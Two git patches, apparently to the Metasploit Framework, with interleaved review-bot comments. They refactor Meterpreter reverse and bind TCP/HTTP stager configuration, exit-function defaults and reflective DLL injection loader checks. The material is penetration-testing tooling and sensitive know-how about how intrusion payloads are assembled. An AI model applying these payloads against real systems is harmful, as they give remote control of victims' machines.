From 42f94e70c7f4a2b2f0ae47810a056be28bf45014 Mon Sep 17 00:00:00 2001 From: OJ Date: Tue, 12 May 2015 09:05:58 +1000 Subject: [PATCH 1/2] Add `nil` default to exit_types, transport param order swap This allows for checking against exit types to be super easy instead of having to have extra checks in place. Also changed the order of scope_id and uri in the transport URI generation. The net effect of this is NOP because these things only appear separately. --- lib/msf/core/payload/windows.rb | 4 +++- lib/rex/payloads/meterpreter/config.rb | 8 ++------ 2 files changed, 5 insertions(+), 7 deletions(-) diff --git a/lib/msf/core/payload/windows.rb b/lib/msf/core/payload/windows.rb index 84d380e16a..f05324a63a 100644 --- a/lib/msf/core/payload/windows.rb +++ b/lib/msf/core/payload/windows.rb @@ -34,10 +34,12 @@ module Msf::Payload::Windows # @@exit_types = { + nil => 0, # Default to nothing + '' => 0, # Default to nothing 'seh' => 0xEA320EFE, # SetUnhandledExceptionFilter 'thread' => 0x0A2A1DE0, # ExitThread 'process' => 0x56A2B5F0, # ExitProcess - 'none' => 0x5DE2C5AA, # GetLastError + 'none' => 0x5DE2C5AA # GetLastError } # diff --git a/lib/rex/payloads/meterpreter/config.rb b/lib/rex/payloads/meterpreter/config.rb index 49292b5331..ede3250504 100644 --- a/lib/rex/payloads/meterpreter/config.rb +++ b/lib/rex/payloads/meterpreter/config.rb @@ -49,11 +49,7 @@ private def session_block(opts) uuid = to_str(opts[:uuid].to_raw, UUID_SIZE) - if opts[:exitfunk] - exit_func = Msf::Payload::Windows.exit_types[opts[:exitfunk]] - else - exit_func = 0 - end + exit_func = Msf::Payload::Windows.exit_types[opts[:exitfunk]] session_data = [ 0, # comms socket, patched in by the stager @@ -74,8 +70,8 @@ private end url = "#{opts[:scheme]}://#{lhost}:#{opts[:lport]}" - url << "?#{opts[:scope_id]}" if opts[:scope_id] url << "#{opts[:uri]}/" if opts[:uri] + url << "?#{opts[:scope_id]}" if opts[:scope_id] # if the transport URI is for a HTTP payload we need to add a stack # of other stuff 
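Review bot: In `session_block` (lib/rex/payloads/meterpreter/config.rb), `exit_types[opts[:exitfunk]]` still evaluates to `nil` for any name that is not a key of the table, so the new `nil` and `''` entries cover only the unset and empty cases. If an unrecognised value should fall back the same way, `exit_func = Msf::Payload::Windows.exit_types.fetch(opts[:exitfunk], 0)` does that without the two extra keys. If it should be rejected instead, `fetch` with no default raises `KeyError` at the lookup rather than passing `nil` on. How `exit_func` is consumed lies outside the hunk, so the effect of a `nil` there is inferred.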
From 69d2b8ffb1994f990311065d53235d60ac74acf7 Mon Sep 17 00:00:00 2001 From: OJ Date: Tue, 12 May 2015 09:25:02 +1000 Subject: [PATCH 2/2] Various code format, style changes, file moves As per Egypt's suggestions. --- lib/msf/core/handler/reverse_hop_http.rb | 8 ++--- lib/msf/core/handler/reverse_http.rb | 8 ++--- lib/msf/core/payload/linux/bind_tcp.rb | 22 +++++++------- lib/msf/core/payload/linux/reverse_tcp.rb | 30 ++++++++----------- .../core/{ => payload}/transport_config.rb | 2 +- lib/msf/core/payload/windows/bind_tcp.rb | 24 +++++++-------- .../payload/windows/meterpreter_loader.rb | 11 ++++--- .../payload/windows/reflectivedllinject.rb | 9 +++--- lib/msf/core/payload/windows/reverse_http.rb | 4 +-- lib/msf/core/payload/windows/reverse_tcp.rb | 26 +++++++--------- .../core/payload/windows/reverse_winhttp.rb | 4 +-- .../core/payload/windows/reverse_winhttps.rb | 4 +-- lib/msf/core/payload/windows/x64/bind_tcp.rb | 23 +++++++------- .../payload/windows/x64/meterpreter_loader.rb | 11 ++++--- .../windows/x64/reflectivedllinject.rb | 9 +++--- .../core/payload/windows/x64/reverse_tcp.rb | 30 ++++++++----------- .../singles/windows/meterpreter_bind_tcp.rb | 24 +++++++-------- .../windows/meterpreter_reverse_http.rb | 24 +++++++-------- .../windows/meterpreter_reverse_https.rb | 24 +++++++-------- .../windows/meterpreter_reverse_ipv6_tcp.rb | 24 +++++++-------- .../windows/meterpreter_reverse_tcp.rb | 24 +++++++-------- .../windows/x64/meterpreter_bind_tcp.rb | 24 +++++++-------- .../windows/x64/meterpreter_reverse_http.rb | 24 +++++++-------- .../windows/x64/meterpreter_reverse_https.rb | 24 +++++++-------- .../x64/meterpreter_reverse_ipv6_tcp.rb | 24 +++++++-------- .../windows/x64/meterpreter_reverse_tcp.rb | 24 +++++++-------- 26 files changed, 220 insertions(+), 245 deletions(-) rename lib/msf/core/{ => payload}/transport_config.rb (98%) 
diff --git a/lib/msf/core/handler/reverse_hop_http.rb b/lib/msf/core/handler/reverse_hop_http.rb index b4b715d1f4..0ead3894a0 100644 --- a/lib/msf/core/handler/reverse_hop_http.rb +++ b/lib/msf/core/handler/reverse_hop_http.rb @@ -252,10 +252,10 @@ module ReverseHopHttp url = full_uri + conn_id + "/\x00" print_status("Preparing stage for next session #{conn_id}") - blob = stage_payload({ - :uuid => uuid, - :uri => conn_id - }) + blob = stage_payload( + uuid: uuid, + uri: conn_id + ) #send up crequest = mclient.request_raw( diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index 6b63080445..d442d6727d 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -325,10 +325,10 @@ protected # generate the stage, but pass in the existing UUID and connection id so that # we don't get new ones generated. - blob = obj.stage_payload({ - :uuid => uuid, - :uri => conn_id - }) + blob = obj.stage_payload( + uuid: uuid, + uri: conn_id + ) resp.body = encode_stage(blob) diff --git a/lib/msf/core/payload/linux/bind_tcp.rb b/lib/msf/core/payload/linux/bind_tcp.rb index bb93a8d250..83b02fc4a4 100644 --- a/lib/msf/core/payload/linux/bind_tcp.rb +++ b/lib/msf/core/payload/linux/bind_tcp.rb @@ -1,7 +1,7 @@ # -*- coding: binary -*- require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' module Msf 
@@ -15,26 +15,24 @@ module Msf module Payload::Linux::BindTcp - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Linux # # Generate the first stage # def generate - - # Generate the simple version of this stager if we don't have enough space - if self.available_space.nil? || required_space > self.available_space - return generate_bind_tcp({ - :port => datastore['LPORT'] - }) - end - conf = { - :port => datastore['LPORT'], - :reliable => true + port: datastore['LPORT'], + reliable: false } + # Generate the more advanced stager if we have the space + unless self.available_space.nil? || required_space > self.available_space + conf[:exitfunk] = datastore['EXITFUNC'], + conf[:reliable] = true + end + generate_bind_tcp(conf) end diff --git a/lib/msf/core/payload/linux/reverse_tcp.rb b/lib/msf/core/payload/linux/reverse_tcp.rb index a2d0fca9da..5b190f93b0 100644 --- a/lib/msf/core/payload/linux/reverse_tcp.rb +++ b/lib/msf/core/payload/linux/reverse_tcp.rb @@ -1,7 +1,7 @@ # -*- coding: binary -*- require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' require 'msf/core/payload/linux' module Msf 
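Review bot: The trailing comma after `conf[:exitfunk] = datastore['EXITFUNC'],` in `generate` (lib/msf/core/payload/linux/bind_tcp.rb) makes Ruby treat the following line as a second right-hand value, so `conf[:exitfunk]` is assigned the array `[datastore['EXITFUNC'], true]` instead of the option string. It looks like a leftover from the old hash literal; the line should read `conf[:exitfunk] = datastore['EXITFUNC']`. The same comma appears in `generate` in lib/msf/core/payload/windows/bind_tcp.rb and lib/msf/core/payload/windows/x64/bind_tcp.rb later in this patch. The removed Linux code never passed `:exitfunk` at all, so this is also a new option on that path.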
@@ -16,30 +16,26 @@ module Msf module Payload::Linux::ReverseTcp - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Linux # # Generate the first stage # def generate - # Generate the simple version of this stager if we don't have enough space - if self.available_space.nil? || required_space > self.available_space - return generate_reverse_tcp( - port: datastore['LPORT'], - host: datastore['LHOST'], - retry_count: datastore['ReverseConnectRetries'], - ) - end - conf = { - host: datastore['LHOST'], - port: datastore['LPORT'], + port: datastore['LPORT'], + host: datastore['LHOST'], retry_count: datastore['ReverseConnectRetries'], - exitfunk: datastore['EXITFUNC'], - reliable: true + reliable: false } + # Generate the advanced stager if we have space + unless self.available_space.nil? || required_space > self.available_space + conf[:exitfunk] = datastore['EXITFUNC'] + conf[:reliable] = true + end + generate_reverse_tcp(conf) end @@ -79,8 +75,8 @@ module Payload::Linux::ReverseTcp # def asm_reverse_tcp(opts={}) # TODO: reliability is coming - #retry_count = [opts[:retry_count].to_i, 1].max - #reliable = opts[:reliable] + retry_count = [opts[:retry_count].to_i, 1].max + reliable = opts[:reliable] encoded_port = "0x%.8x" % [opts[:port].to_i,2].pack("vn").unpack("N").first encoded_host = "0x%.8x" % Rex::Socket.addr_aton(opts[:host]||"127.127.127.127").unpack("V").first diff --git a/lib/msf/core/transport_config.rb b/lib/msf/core/payload/transport_config.rb similarity index 98% rename from lib/msf/core/transport_config.rb rename to lib/msf/core/payload/transport_config.rb index 281f9686df..177684ed47 100644 --- a/lib/msf/core/transport_config.rb +++ b/lib/msf/core/payload/transport_config.rb 
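Review bot: In `asm_reverse_tcp` (lib/msf/core/payload/linux/reverse_tcp.rb) the two lines un-commented under `# TODO: reliability is coming` assign `retry_count` and `reliable`, but nothing in the visible part of the method reads them, which `ruby -w` reports as assigned but unused. Either leave them commented out until the feature lands or mark them as deliberately unused, e.g. `_reliable = opts[:reliable]`. The same applies to `asm_reverse_tcp` in lib/msf/core/payload/windows/x64/reverse_tcp.rb. The method body continues past the end of the hunk, so a later use cannot be ruled out from here.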
@@ -6,7 +6,7 @@ require 'msf/core/payload/uuid_options' # This module contains helper functions for creating the transport # configuration stubs that are used for Meterpreter payloads. ## -module Msf::TransportConfig +module Msf::Payload::TransportConfig include Msf::Payload::UUIDOptions diff --git a/lib/msf/core/payload/windows/bind_tcp.rb b/lib/msf/core/payload/windows/bind_tcp.rb index 5eceff5d67..5aa6cd3f94 100644 --- a/lib/msf/core/payload/windows/bind_tcp.rb +++ b/lib/msf/core/payload/windows/bind_tcp.rb @@ -1,7 +1,7 @@ # -*- coding: binary -*- require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' require 'msf/core/payload/windows/block_api' require 'msf/core/payload/windows/exitfunk' @@ -17,7 +17,7 @@ module Msf module Payload::Windows::BindTcp - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Windows include Msf::Payload::Windows::BlockApi include Msf::Payload::Windows::Exitfunk @@ -26,21 +26,17 @@ module Payload::Windows::BindTcp # Generate the first stage # def generate - - # Generate the simple version of this stager if we don't have enough space - if self.available_space.nil? || required_space > self.available_space - return generate_bind_tcp({ - :port => datastore['LPORT'].to_i, - :reliable => false - }) - end - conf = { - :port => datastore['LPORT'].to_i, - :exitfunk => datastore['EXITFUNC'], - :reliable => true + port: datastore['LPORT'], + reliable: false } + # Generate the more advanced stager if we have the space + unless self.available_space.nil? || required_space > self.available_space + conf[:exitfunk] = datastore['EXITFUNC'], + conf[:reliable] = true + end + generate_bind_tcp(conf) end diff --git a/lib/msf/core/payload/windows/meterpreter_loader.rb b/lib/msf/core/payload/windows/meterpreter_loader.rb index c053e82ba5..9047397807 100644 --- a/lib/msf/core/payload/windows/meterpreter_loader.rb +++ b/lib/msf/core/payload/windows/meterpreter_loader.rb 
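Review bot: `generate` in lib/msf/core/payload/windows/bind_tcp.rb now passes `port: datastore['LPORT']` where both removed branches passed `datastore['LPORT'].to_i`, so the type handed to `generate_bind_tcp` can change in a commit described as formatting and style only. Whether the callee coerces the port itself is not visible in this hunk. If it does not, keep the conversion: `port: datastore['LPORT'].to_i,`.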
@@ -71,9 +71,9 @@ module Payload::Windows::MeterpreterLoader dll, offset = load_rdi_dll(MetasploitPayloads.meterpreter_path('metsrv', 'x86.dll')) asm_opts = { - :rdi_offset => offset, - :length => dll.length, - :stageless => stageless + rdi_offset: offset, + length: dll.length, + stageless: stageless } asm = asm_invoke_metsrv(asm_opts) @@ -82,9 +82,8 @@ module Payload::Windows::MeterpreterLoader bootstrap = Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string # sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry - if( bootstrap.length > 62 ) - print_error( "Meterpreter loader (x86) generated an oversized bootstrap!" ) - return + if bootstrap.length > 62 + raise RuntimeError, "Meterpreter loader (x86) generated an oversized bootstrap!" end # patch the bootstrap code into the dll's DOS header... diff --git a/lib/msf/core/payload/windows/reflectivedllinject.rb b/lib/msf/core/payload/windows/reflectivedllinject.rb index c0146ace04..50139c1e4f 100644 --- a/lib/msf/core/payload/windows/reflectivedllinject.rb +++ b/lib/msf/core/payload/windows/reflectivedllinject.rb @@ -75,8 +75,8 @@ module Payload::Windows::ReflectiveDllInject dll, offset = load_rdi_dll(library_path) asm_opts = { - :rdi_offset => offset, - :exitfunk => 'thread' # default to 'thread' for migration + rdi_offset: offset, + exitfunk: 'thread' # default to 'thread' for migration } asm = asm_invoke_dll(asm_opts) @@ -85,9 +85,8 @@ module Payload::Windows::ReflectiveDllInject bootstrap = Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string # sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry - if( bootstrap.length > 62 ) - print_error( "Reflective Dll Injection (x86) generated an oversized bootstrap!" ) - return + if bootstrap.length > 62 + raise RuntimeError, "Reflective DLL Injection (x86) generated an oversized bootstrap!" end # patch the bootstrap code into the dll's DOS header... 
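Review bot: The oversized-bootstrap check in lib/msf/core/payload/windows/meterpreter_loader.rb now raises where it used to `print_error` and return `nil`, so any caller that tested the result for `nil` will see an exception instead; those callers are outside this patch and should be checked. `RuntimeError` is already the default class for `raise` with a string, so `raise "Meterpreter loader (x86) generated an oversized bootstrap!"` is the idiomatic form. A named constant for `62`, carrying the existing e_lfanew comment, would make the limit self-describing. The same change is made in reflectivedllinject.rb and in both x64 counterparts, and the enclosing method starts and ends outside the hunk.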
diff --git a/lib/msf/core/payload/windows/reverse_http.rb b/lib/msf/core/payload/windows/reverse_http.rb index 73958d3abf..71b3df71e2 100644 --- a/lib/msf/core/payload/windows/reverse_http.rb +++ b/lib/msf/core/payload/windows/reverse_http.rb @@ -1,7 +1,7 @@ # -*- coding: binary -*- require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' require 'msf/core/payload/windows/block_api' require 'msf/core/payload/windows/exitfunk' require 'msf/core/payload/uuid_options' @@ -18,7 +18,7 @@ module Msf module Payload::Windows::ReverseHttp - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Windows include Msf::Payload::Windows::BlockApi include Msf::Payload::Windows::Exitfunk diff --git a/lib/msf/core/payload/windows/reverse_tcp.rb b/lib/msf/core/payload/windows/reverse_tcp.rb index c0e8e5102f..770effc317 100644 --- a/lib/msf/core/payload/windows/reverse_tcp.rb +++ b/lib/msf/core/payload/windows/reverse_tcp.rb @@ -1,7 +1,7 @@ # -*- coding: binary -*- require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' require 'msf/core/payload/windows/block_api' require 'msf/core/payload/windows/exitfunk' @@ -15,7 +15,7 @@ module Msf module Payload::Windows::ReverseTcp - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Windows include Msf::Payload::Windows::BlockApi include Msf::Payload::Windows::Exitfunk 
@@ -24,23 +24,19 @@ module Payload::Windows::ReverseTcp # Generate the first stage # def generate - # Generate the simple version of this stager if we don't have enough space - if self.available_space.nil? || required_space > self.available_space - return generate_reverse_tcp( - port: datastore['LPORT'], - host: datastore['LHOST'], - retry_count: datastore['ReverseConnectRetries'], - ) - end - conf = { - host: datastore['LHOST'], - port: datastore['LPORT'], + port: datastore['LPORT'], + host: datastore['LHOST'], retry_count: datastore['ReverseConnectRetries'], - exitfunk: datastore['EXITFUNC'], - reliable: true + reliable: false } + # Generate the advanced stager if we have space + unless self.available_space.nil? || required_space > self.available_space + conf[:exitfunk] = datastore['EXITFUNC'] + conf[:reliable] = true + end + generate_reverse_tcp(conf) end diff --git a/lib/msf/core/payload/windows/reverse_winhttp.rb b/lib/msf/core/payload/windows/reverse_winhttp.rb index a3861b11a1..0b0f9bb625 100644 --- a/lib/msf/core/payload/windows/reverse_winhttp.rb +++ b/lib/msf/core/payload/windows/reverse_winhttp.rb @@ -1,7 +1,7 @@ # -*- coding: binary -*- require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' require 'msf/core/payload/windows/block_api' require 'msf/core/payload/windows/exitfunk' require 'msf/core/payload/windows/reverse_http' @@ -18,7 +18,7 @@ module Msf module Payload::Windows::ReverseWinHttp - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Windows::ReverseHttp # diff --git a/lib/msf/core/payload/windows/reverse_winhttps.rb b/lib/msf/core/payload/windows/reverse_winhttps.rb index a91f2e4d30..1738f682ee 100644 --- a/lib/msf/core/payload/windows/reverse_winhttps.rb +++ b/lib/msf/core/payload/windows/reverse_winhttps.rb 
@@ -1,7 +1,7 @@ # -*- coding: binary -*- require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' require 'msf/core/payload/windows/reverse_winhttp' require 'msf/core/payload/windows/verify_ssl' require 'rex/payloads/meterpreter/uri_checksum' @@ -18,7 +18,7 @@ module Msf module Payload::Windows::ReverseWinHttps - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Windows::ReverseWinHttp include Msf::Payload::Windows::VerifySsl diff --git a/lib/msf/core/payload/windows/x64/bind_tcp.rb b/lib/msf/core/payload/windows/x64/bind_tcp.rb index b7ebad198d..d630feb805 100644 --- a/lib/msf/core/payload/windows/x64/bind_tcp.rb +++ b/lib/msf/core/payload/windows/x64/bind_tcp.rb @@ -1,7 +1,7 @@ # -*- coding: binary -*- require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' require 'msf/core/payload/windows/x64/block_api' require 'msf/core/payload/windows/x64/exitfunk' @@ -15,7 +15,7 @@ module Msf module Payload::Windows::BindTcp_x64 - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Windows include Msf::Payload::Windows::BlockApi_x64 include Msf::Payload::Windows::Exitfunk_x64 @@ -24,20 +24,17 @@ module Payload::Windows::BindTcp_x64 # Generate the first stage # def generate - # Generate the simple version of this stager if we don't have enough space - if self.available_space.nil? || required_space > self.available_space - return generate_bind_tcp({ - :port => datastore['LPORT'], - :reliable => false - }) - end - conf = { - :port => datastore['LPORT'], - :exitfunk => datastore['EXITFUNC'], - :reliable => true + port: datastore['LPORT'], + reliable: false } + # Generate the more advanced stager if we have the space + unless self.available_space.nil? || required_space > self.available_space + conf[:exitfunk] = datastore['EXITFUNC'], + conf[:reliable] = true + end + generate_bind_tcp(conf) end 
diff --git a/lib/msf/core/payload/windows/x64/meterpreter_loader.rb b/lib/msf/core/payload/windows/x64/meterpreter_loader.rb index c6507c5b2b..c618eec805 100644 --- a/lib/msf/core/payload/windows/x64/meterpreter_loader.rb +++ b/lib/msf/core/payload/windows/x64/meterpreter_loader.rb @@ -74,9 +74,9 @@ module Payload::Windows::MeterpreterLoader_x64 dll, offset = load_rdi_dll(MetasploitPayloads.meterpreter_path('metsrv', 'x64.dll')) asm_opts = { - :rdi_offset => offset, - :length => dll.length, - :stageless => stageless + rdi_offset: offset, + length: dll.length, + stageless: stageless } asm = asm_invoke_metsrv(asm_opts) @@ -85,9 +85,8 @@ module Payload::Windows::MeterpreterLoader_x64 bootstrap = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string # sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry - if( bootstrap.length > 62 ) - print_error( "Meterpreter loader (x64) generated an oversized bootstrap!" ) - return + if bootstrap.length > 62 + raise RuntimeError, "Meterpreter loader (x64) generated an oversized bootstrap!" end # patch the bootstrap code into the dll's DOS header... diff --git a/lib/msf/core/payload/windows/x64/reflectivedllinject.rb b/lib/msf/core/payload/windows/x64/reflectivedllinject.rb index 44dd5ec575..0194d902d3 100644 --- a/lib/msf/core/payload/windows/x64/reflectivedllinject.rb +++ b/lib/msf/core/payload/windows/x64/reflectivedllinject.rb @@ -76,8 +76,8 @@ module Payload::Windows::ReflectiveDllInject_x64 dll, offset = load_rdi_dll(library_path) asm_opts = { - :rdi_offset => offset, - :exitfunk => 'thread' # default to 'thread' for migration + rdi_offset: offset, + exitfunk: 'thread' # default to 'thread' for migration } asm = asm_invoke_dll(asm_opts) 
@@ -86,9 +86,8 @@ module Payload::Windows::ReflectiveDllInject_x64 bootstrap = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string # sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry - if( bootstrap.length > 62 ) - print_error( "Reflective Dll Injection (x64) generated an oversized bootstrap!" ) - return + if bootstrap.length > 62 + raise RuntimeError, "Reflective DLL Injection (x64) generated an oversized bootstrap!" end # patch the bootstrap code into the dll's DOS header... diff --git a/lib/msf/core/payload/windows/x64/reverse_tcp.rb b/lib/msf/core/payload/windows/x64/reverse_tcp.rb index e726687572..110a3a1294 100644 --- a/lib/msf/core/payload/windows/x64/reverse_tcp.rb +++ b/lib/msf/core/payload/windows/x64/reverse_tcp.rb @@ -1,7 +1,7 @@ # -*- coding: binary -*- require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' require 'msf/core/payload/windows/x64/block_api' require 'msf/core/payload/windows/x64/exitfunk' @@ -15,7 +15,7 @@ module Msf module Payload::Windows::ReverseTcp_x64 - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Windows include Msf::Payload::Windows::BlockApi_x64 include Msf::Payload::Windows::Exitfunk_x64 
@@ -31,24 +31,19 @@ module Payload::Windows::ReverseTcp_x64 # Generate the first stage # def generate - # TODO: coming later - # Generate the simple version of this stager if we don't have enough space - #if self.available_space.nil? || required_space > self.available_space - # return generate_reverse_tcp( - # port: datastore['LPORT'], - # host: datastore['LHOST'], - # retry_count: datastore['ReverseConnectRetries'], - # ) - #end - conf = { - host: datastore['LHOST'], port: datastore['LPORT'], + host: datastore['LHOST'], retry_count: datastore['ReverseConnectRetries'], - exitfunk: datastore['EXITFUNC'], - reliable: true + reliable: false } + # Generate the advanced stager if we have space + unless self.available_space.nil? || required_space > self.available_space + conf[:exitfunk] = datastore['EXITFUNC'] + conf[:reliable] = true + end + generate_reverse_tcp(conf) end @@ -98,8 +93,9 @@ module Payload::Windows::ReverseTcp_x64 # def asm_reverse_tcp(opts={}) - #retry_count = [opts[:retry_count].to_i, 1].max - # TODO: reliable = opts[:reliable] + # TODO: reliability coming later + reliable = opts[:reliable] + retry_count = [opts[:retry_count].to_i, 1].max encoded_port = [opts[:port].to_i,2].pack("vn").unpack("N").first encoded_host = Rex::Socket.addr_aton(opts[:host]||"127.127.127.127").unpack("V").first encoded_host_port = "0x%.8x%.8x" % [encoded_host, encoded_port] diff --git a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb index 43627c5433..ab8a59fe48 100644 --- a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/windows/meterpreter_loader' require 'msf/base/sessions/meterpreter_x86_win' 
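Review bot: `generate` in lib/msf/core/payload/windows/x64/reverse_tcp.rb changes behaviour rather than format. The old code always passed `exitfunk` and `reliable: true`, because the space check was commented out as `TODO: coming later`; the new code omits `exitfunk` and keeps `reliable: false` whenever `available_space` is nil or too small. Whether the x64 `generate_reverse_tcp` copes with a missing `:exitfunk` is not visible here. If the switch is intended, it deserves a line in the commit message and a comment above the initial `conf`, such as `# small stager by default: no exitfunk, not reliable`.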
@@ -15,7 +15,7 @@ module Metasploit4 CachedSize = 906910 - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Windows include Msf::Payload::Single include Msf::Payload::Windows::MeterpreterLoader @@ -45,20 +45,20 @@ module Metasploit4 def generate_config(opts={}) unless opts[:uuid] - opts[:uuid] = Msf::Payload::UUID.new({ - :platform => 'windows', - :arch => ARCH_X86 - }) + opts[:uuid] = Msf::Payload::UUID.new( + platform: 'windows', + arch: ARCH_X86 + ) end # create the configuration block config_opts = { - :arch => opts[:uuid].arch, - :exitfunk => datastore['EXITFUNC'], - :expiration => datastore['SessionExpirationTimeout'].to_i, - :uuid => opts[:uuid], - :transports => [transport_config_bind_tcp(opts)], - :extensions => (datastore['EXTENSIONS'] || '').split(',') + arch: opts[:uuid].arch, + exitfunk: datastore['EXITFUNC'], + expiration: datastore['SessionExpirationTimeout'].to_i, + uuid: opts[:uuid], + transports: [transport_config_bind_tcp(opts)], + extensions: (datastore['EXTENSIONS'] || '').split(',') } # create the configuration instance based off the parameters diff --git a/modules/payloads/singles/windows/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/meterpreter_reverse_http.rb index 0bd7fd2994..b12ad4d64e 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_http.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' require 'msf/core/handler/reverse_http' require 'msf/core/payload/windows/meterpreter_loader' require 'msf/base/sessions/meterpreter_x86_win' @@ -15,7 +15,7 @@ module Metasploit4 CachedSize = 907954 - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Windows include Msf::Payload::Single include Msf::Payload::Windows::MeterpreterLoader 
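Review bot: The `generate_config` body in modules/payloads/singles/windows/meterpreter_bind_tcp.rb is repeated almost verbatim in every other single this patch touches, differing only in the arch constant and the `transport_config_*` call. A shared helper taking those two as arguments would leave one place to maintain. The method also writes the generated UUID back into the caller's hash via `opts[:uuid] = ...`; if `transport_config_bind_tcp(opts)` depends on that, a comment such as `# opts[:uuid] is filled in here because the transport config reads it` would make the side effect explicit. The method continues past the end of the hunk.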
@@ -45,20 +45,20 @@ module Metasploit4 def generate_config(opts={}) unless opts[:uuid] - opts[:uuid] = Msf::Payload::UUID.new({ - :platform => 'windows', - :arch => ARCH_X86 - }) + opts[:uuid] = Msf::Payload::UUID.new( + platform: 'windows', + arch: ARCH_X86 + ) end # create the configuration block config_opts = { - :arch => opts[:uuid].arch, - :exitfunk => datastore['EXITFUNC'], - :expiration => datastore['SessionExpirationTimeout'].to_i, - :uuid => opts[:uuid], - :transports => [transport_config_reverse_http(opts)], - :extensions => (datastore['EXTENSIONS'] || '').split(',') + arch: opts[:uuid].arch, + exitfunk: datastore['EXITFUNC'], + expiration: datastore['SessionExpirationTimeout'].to_i, + uuid: opts[:uuid], + transports: [transport_config_reverse_http(opts)], + extensions: (datastore['EXTENSIONS'] || '').split(',') } # create the configuration instance based off the parameters diff --git a/modules/payloads/singles/windows/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/meterpreter_reverse_https.rb index 9fe4cde3dc..5cbb815cca 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' require 'msf/core/handler/reverse_https' require 'msf/core/payload/windows/meterpreter_loader' require 'msf/base/sessions/meterpreter_x86_win' @@ -15,7 +15,7 @@ module Metasploit4 CachedSize = 907954 - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Windows include Msf::Payload::Single include Msf::Payload::Windows::MeterpreterLoader 
@@ -45,20 +45,20 @@ module Metasploit4 def generate_config(opts={}) unless opts[:uuid] - opts[:uuid] = Msf::Payload::UUID.new({ - :platform => 'windows', - :arch => ARCH_X86 - }) + opts[:uuid] = Msf::Payload::UUID.new( + platform: 'windows', + arch: ARCH_X86 + ) end # create the configuration block config_opts = { - :arch => opts[:uuid].arch, - :exitfunk => datastore['EXITFUNC'], - :expiration => datastore['SessionExpirationTimeout'].to_i, - :uuid => opts[:uuid], - :transports => [transport_config_reverse_https(opts)], - :extensions => (datastore['EXTENSIONS'] || '').split(',') + arch: opts[:uuid].arch, + exitfunk: datastore['EXITFUNC'], + expiration: datastore['SessionExpirationTimeout'].to_i, + uuid: opts[:uuid], + transports: [transport_config_reverse_https(opts)], + extensions: (datastore['EXTENSIONS'] || '').split(',') } # create the configuration instance based off the parameters diff --git a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb index 971d5cd97a..1641594c5d 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -require 'msf/core/transport_config' +require 'msf/core/payload/transport_config' require 'msf/core/handler/reverse_tcp' require 'msf/core/payload/windows/meterpreter_loader' require 'msf/base/sessions/meterpreter_x86_win' @@ -15,7 +15,7 @@ module Metasploit4 CachedSize = 906910 - include Msf::TransportConfig + include Msf::Payload::TransportConfig include Msf::Payload::Windows include Msf::Payload::Single include Msf::Payload::Windows::MeterpreterLoader 
